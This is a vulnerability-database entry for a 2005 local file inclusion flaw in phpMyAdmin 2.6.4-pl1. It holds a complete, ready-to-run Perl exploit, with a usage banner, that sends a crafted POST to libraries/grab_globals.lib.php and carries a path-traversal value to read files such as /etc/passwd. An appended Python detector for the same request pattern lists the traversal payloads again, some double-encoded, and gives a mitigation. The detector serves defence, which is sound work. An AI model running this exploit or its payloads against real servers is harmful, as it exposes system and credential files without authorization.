phpMyAdmin 2.6.4-pl1 Local file inclusion exploit

2005-10-10 / 2005-09-30
Risk: Medium
Local: No
Remote: Yes
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

#!/usr/bin/perl
use IO::Socket;
# CXSecurity TEAM
# Maksymilian Arciemowicz
# Local file inclusion (./$FILE)
# simple exploit phpMyAdmin 2.6.4-pl1
#
#
# CXSecurity

# Usage banner when fewer than three arguments are given.
if (@ARGV < 3) {
    print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
    print " \r\n";
    print "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE\r\n\r\n";
    print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
    print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
    print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";
    print "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/ ../../../../../etc/passwd\r\n\r\n";
    exit();
}

$HOST = $ARGV[0];
# The request goes straight at the library file, which is not meant to be requested directly.
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
# POST body: usesubform[] enables subform handling, subform[1][redirect] carries the path that gets included.
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][cXIb8O3]=1";
$LENGTH = length $FILE;

print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;    # strip the scheme, leaving the bare host name for the socket

$get1 = IO::Socket::INET->new(
    Proto    => "tcp",
    PeerAddr => "$HOST",
    PeerPort => "80") || die "Error 404\r\n\r\n";

print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".$HOST."\n";    # original read %HOST (a hash), which interpolated nothing
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";
print $get1 $FILE;

# Echo the response; PHP's "Unable to access ./<file>" warning means the include target was not found.
while ($odp = <$get1>) {
    if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) {
        print "\n\nFile ".$ARGV[2]." no exists.\r\n\r\n";    # print, not printf: the file name is not a format string
        exit;
    }
    print $odp;    # print, not printf: response lines may contain '%' sequences
}
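Added defender-side example (not part of the original advisory and not phpMyAdmin code): a small Python checker that flags the request shape the script above sends, namely a direct request to libraries/grab_globals.lib.php and a subform[...][redirect] value carrying a traversal sequence or absolute path, as a proxy or WAF log review would. The sample requests are constructed; the value is decoded a second time so double-encoded variants are caught too.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample requests (method, path, body) as a reverse proxy or WAF
# would log them. The first two mirror the advisory's POST (the second one
# double-encoded), the third is a benign use of the subform redirect
# mechanism, the fourth is unrelated traffic.
SAMPLE_REQUESTS = [
    ("POST", "/phpMyAdmin-2.6.4-pl1/libraries/grab_globals.lib.php",
     "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=../../../../../etc/passwd&subform[1][cXIb8O3]=1"),
    ("POST", "/phpMyAdmin-2.6.4-pl1/libraries/grab_globals.lib.php",
     "usesubform[1]=1&subform[1][redirect]=%252e%252e%252fetc%252fpasswd"),
    ("POST", "/phpMyAdmin-2.6.4-pl1/tbl_properties.php",
     "usesubform[1]=1&subform[1][redirect]=tbl_properties_structure.php"),
    ("GET", "/phpMyAdmin-2.6.4-pl1/index.php", ""),
]

# PHP-style nested key: subform[<anything>][redirect]
SUBFORM_REDIRECT = re.compile(r"^subform\[[^\]]*\]\[redirect\]$")
# "../" or "..\" anywhere, a leading slash/backslash, or an embedded NUL
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)|^[\\/]|\x00")


def redirect_params(body):
    """Return every subform[*][redirect] value from a urlencoded body.

    parse_qsl decodes once; unquote decodes a second time so that a
    double-encoded value is compared in its final form.
    """
    return [unquote(value) for key, value in parse_qsl(body, keep_blank_values=True)
            if SUBFORM_REDIRECT.match(key)]


def classify(method, path, body):
    """Return a list of findings for one request (empty when nothing is suspicious)."""
    findings = []
    if path.lower().endswith("/libraries/grab_globals.lib.php"):
        findings.append("direct request to libraries/grab_globals.lib.php "
                        "(library files are included by the application, not requested)")
    for value in redirect_params(body):
        if TRAVERSAL.search(value):
            findings.append("subform[*][redirect] carries a traversal/absolute path: %r" % value)
    return findings


if __name__ == "__main__":
    for method, path, body in SAMPLE_REQUESTS:
        for finding in classify(method, path, body):
            print("%s %s: %s" % (method, path, finding))
```

Blocking direct requests to the libraries/ directory at the web server removes the first condition entirely, which is the simplest mitigation where upgrading is not immediately possible.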

References:

http://cxsecurity.com/issue/WLB-2005100029
